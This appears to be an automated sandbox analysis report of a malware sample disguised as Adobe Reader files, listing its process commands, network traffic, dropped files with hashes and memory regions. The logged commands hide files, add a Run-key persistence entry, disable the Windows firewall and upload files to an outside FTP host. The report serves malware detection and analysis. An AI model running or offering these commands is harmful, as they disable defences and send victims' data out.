C:\Windows\SysWOW64\attrib.exe

attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\RAdobe\RADBR\AREADER"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\nimiki09.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\enikiol03.bat" /quiet /norestart"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -x -x -x -d -nuttyhdff -s:nuttyhdff.nuttyhdff ftp.freehostia.com -nuttyhdff

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "lodhgyuuuf" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\aijw01.bat"

C:\Windows\SysWOW64\ipconfig.exe

ipconfig /all

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

adbr01.exe -f "011.011"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr01.exe

adbr01.exe -f "011.011"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe

adbr02.exe -f "112.112"

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\adbr02.exe

adbr02.exe -f "112.112"

C:\Windows\SysWOW64\netsh.exe

netsh firewall set opmode disable

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set profiles state off

C:\Windows\SysWOW64\netsh.exe

NetSh Advfirewall set allprofiles state off

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -a -c -d -natpasv -s:870.afr ftp.freehostia.com

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\Adobeta.exe

Adobeta.exe -a -c -d -natpasv -s:sun.afr ftp.freehostia.com

C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AadobeRead\BReader.exe

BReader 5359

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 ftp.freehostia.com udp
US 198.23.57.8:21 ftp.freehostia.com tcp
US 198.23.57.8:21 ftp.freehostia.com tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\ZREA.vbs

MD5 d4773871db0e4b8cad180eab60250d3f
SHA1 5ce9259f9dea5985013c836c56ea6182a72c618a
SHA256 64681ae62fc11970f670e0d82efe4eb581cc0312d5c21b3082d7ac507543f3a6
SHA512 2b1ba8a8dc26ca4003cbe8e8d0920c571c5b39e5893bc1008d5a34bbbe4922812c2c8048df76ad28fa153bcaa236e890829c59596360494082dcf2a9ee9bac45

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol02.bat

MD5 d363e3b328794fe3bb4c7161b912da38
SHA1 ea54f834acb70088ca03599591f20c41815b4a60
SHA256 58ed7e647f6d356847c9e9a39fcfa9d5bd6dd7409a402b2162926f635f93983c
SHA512 6e5f5404e78fd968c9d7f9e2dff3dbff0252dae17af70c1bc0e4589e892dca49fb9cdf3f932b1922137411bc754cc048edd71fe014dc4d93731c695bddffe61a

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr01.ght

MD5 4d432bd0929e1fad42c98584dda0b9f5
SHA1 c3381e2205b1e3493e28528cc3f18798c3ba5223
SHA256 ffadb8953d9f92020fb9bb1d31d58aa73383ba83f8b8e762802048db2171e58c
SHA512 bc5d8b1f6f1be46e91ca868320fde9fd0d9311710183e052adc7d112ec5ef42efd222d38dfea7e7292a882254ad5ff0f0dd6a6f0d6b7c8f957a23140111b9750

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\adbr02.ght

MD5 a754735e5ac70d33fd528b079e503ff9
SHA1 d8a0069a07e9b6bd4f07eae04de331cd60f85eb8
SHA256 86f299063483f6134e634d6b356eb38a8e6a779cd0f3d495d49683c0cc9e8e24
SHA512 fed49537700f73abbb4cf7716d03c28010f5f69d280dc188c44c1826927f1ed247238d0983267b037a3b22a69c8668c27d3ccaa0618e303c8d930f4ccc281d9d

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\aijw01.bat

MD5 426de1728c46d6b08f9ad56cf08ab872
SHA1 215e41275f0a1204b3c896f7efbc49700b353950
SHA256 bad31ec72d26efc643a53a2a838e14f179d3242cd6e4f85a16a0b95b17015684
SHA512 9a7131b6edb1e5c2deaafd3286077af939c0abaa7a83bbd19f85de52e56a0dabd9d657281ccc026553ee8e12a6fa49fd8b95a3bcc83bb7a84b48588f25b74a4e

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\Adobeta.exe

MD5 f20a3059bc40437c8dac850095b076cc
SHA1 9b1d118b02ab9942e9fab659329b5556190b08a0
SHA256 5c75cc6d95f79d1d4a1c83b03500dbdc9d9b0b1dacdb61bbf28caf62da366c98
SHA512 d2a497929e8373fb7035601654e80ed05e73282d1a909429286e6afe18344819b3e173fc5fa4d12ef3deadb8d67000b245fb98e376e3fabc2544d0b1a693ee75

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\870.afr

MD5 2a48c0bef4fca10233a53f40feda48a5
SHA1 42e9c79e06fa255083f307c64c2e89cda323b026
SHA256 d7e97baf9575e2f20698fc0538a4003abbd4fba46389072088ed54a8d2629d13
SHA512 f4f009211f93b536ce52900e795cfdb2e40dbba94c70a1156c600c7a98caa9d58dcb19e5f81ad9845a0ea03650ff3bef1267ac02d11828484b8f35423811f7eb

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\BReader.exe

MD5 1a1075e5e307f3a4b8527110a51ce827
SHA1 f453838ed21020b7ca059244feea8579e5aa74ef
SHA256 ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5
SHA512 b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\sun.afr

MD5 1fea6d4df76fb51523a03436c2a047fd
SHA1 6253e8fafc9cd795f72bc3aa9b988774bfb7c5d1
SHA256 497f1dbd7a649f47bbd645b89be11de834a499766d239623000530d751cc83e7
SHA512 5d05608daa4c6d9ac4b25fdc7df15831efbc571b594c12eada8d4b5c9a9ffe34426fc2ba0af4f7bf47253f3829077270cfb7f85cffbfb1eae12ad2bc27bba4d1

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\nimiki09.vbs

MD5 2246aa37b209d0f04831b3f7d9a61edc
SHA1 00899b4b33f264afef734f622a1cf2bf8564dd02
SHA256 e0e34a17e7ac66b91149f3d744d9d765f8bc30bafe7a11c9e1cb13f881768c6d
SHA512 d97935c3afe6c85cc3212ae8b8bf47dfeb108c1c79690b453efbcfde1212e7d10a379331c4d7f67be773f8d36f954ac8516ba629f86a7345ba017f63daff90cd

C:\Users\Admin\AppData\Roaming\Local\4Adobe\4low\enikiol03.bat

MD5 fd7c0388ca12d5d72cbdc97994d59d40
SHA1 655221c41dfdc27631d4b738138bb32680022aea
SHA256 8e7846031b9c738440e55b6ab1d481c17610a330d82d5467761c7e8fbf6ba38a
SHA512 d6a77f0387aeae78ff929c16f0aeea82df93e81eaafcb20e05d3c080602d1fd670a5b84da9cafb031b7a546682171c54931c388734627185019c2eed5fff20e9

memory/3940-40-0x0000000000400000-0x000000000044C000-memory.dmp

memory/3940-43-0x0000000000400000-0x000000000044C000-memory.dmp

memory/1064-47-0x0000000000400000-0x0000000000710000-memory.dmp

memory/4368-51-0x0000000000400000-0x0000000000710000-memory.dmp

memory/4368-53-0x0000000002B60000-0x0000000002D6C000-memory.dmp

memory/4368-57-0x0000000002B60000-0x0000000002D6C000-memory.dmp

memory/4368-62-0x0000000000400000-0x0000000000710000-memory.dmp

memory/4368-65-0x0000000000400000-0x0000000000710000-memory.dmp

memory/4368-63-0x0000000000400000-0x0000000000710000-memory.dmp

memory/4368-67-0x0000000000400000-0x0000000000710000-memory.dmp

memory/4368-66-0x0000000000400000-0x0000000000710000-memory.dmp

memory/4368-68-0x0000000002B60000-0x0000000002D6C000-memory.dmp

memory/4368-73-0x0000000002B60000-0x0000000002D6C000-memory.dmp

memory/4368-76-0x0000000002B60000-0x0000000002D6C000-memory.dmp

memory/1064-78-0x0000000000400000-0x0000000000710000-memory.dmp

memory/1760-82-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/4588-86-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/4588-92-0x0000000002AE0000-0x0000000002CEC000-memory.dmp

memory/4588-88-0x0000000002AE0000-0x0000000002CEC000-memory.dmp

C:\ProgramData\TEMP\RAIDTest

MD5 c2f09542b6c7daf4288f3524c8cebb18
SHA1 9430b21baf07f0d105b9ee5fdd9f868418454517
SHA256 55d7808233c58f1606fff77eb382a02ed729bf5d8b2640fb313d0f7c91e970d4
SHA512 dcc19cfbc78b78708ce2586228424194f846d80b6d072045baaf93559d20f71e809a4eb57e7dac3b4ea109d90aeb585d0b5438dc1dd7d34054c03aa6350d6672

C:\Users\Admin\AppData\Local\Temp\9F86B0A0.TMP

MD5 84399b674a7da7acca7bd4d5562e0d31
SHA1 68d78af0cf71d50e6c510c70a0107a73a094c9b1
SHA256 535743fffe09450b19356638f0a80a8978054fb497ad479544ca3fab39d89957
SHA512 ffacffc2b208aadae8846417342fa49820abeff62c7a8a996f080befc87e7f06653692a766dd7ecb3dbb2b8719fd2a2e70ee183ba720501f89830827482759b9

memory/4588-98-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/4588-99-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/4588-100-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/4588-101-0x0000000000400000-0x00000000006F9000-memory.dmp

memory/4588-102-0x0000000002AE0000-0x0000000002CEC000-memory.dmp

memory/4588-106-0x0000000002AE0000-0x0000000002CEC000-memory.dmp

memory/1760-107-0x0000000000400000-0x00000000006F9000-memory.dmp

C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\011.011

MD5 e1471d5f84084508bea441e81b08800d
SHA1 b4ad5b49e67e5f1020c3a6222b0f4d242f23c9df
SHA256 716b236ef4cb870d1312dc191bf0b0491a1f3e2cc835b4f063fcff0c4877821c
SHA512 a25fede07c6404f5e30417a2a2ad2843d9cd8fae31135c914c84585f02415dcc23831c6e248d0647212bb287bc29a836ff89685ddf5fcf02ed73b26bf4365ae3

C:\Users\Admin\AppData\Roaming\Adobe\Adobe INC\AadobeRead\112.112

MD5 51e38a852a05cc9718fa3f68041e9dad
SHA1 dd4bee5a01be174c3fda9904c61cfb2c41ede71c
SHA256 b6e9dcb02e18ec89d3e003c56fffab57b9afb032f89f5a7826b729311938b288
SHA512 197fb341edd0185948ff9739368ab0bea74012e87c9d27a67a665af50be2df7d6305b336e16cd1cec04dcca330dbbf6103d942ca9796030eb0b67fd331bea675

memory/3776-119-0x0000000000400000-0x000000000044C000-memory.dmp

memory/3460-122-0x0000000000400000-0x000000000044C000-memory.dmp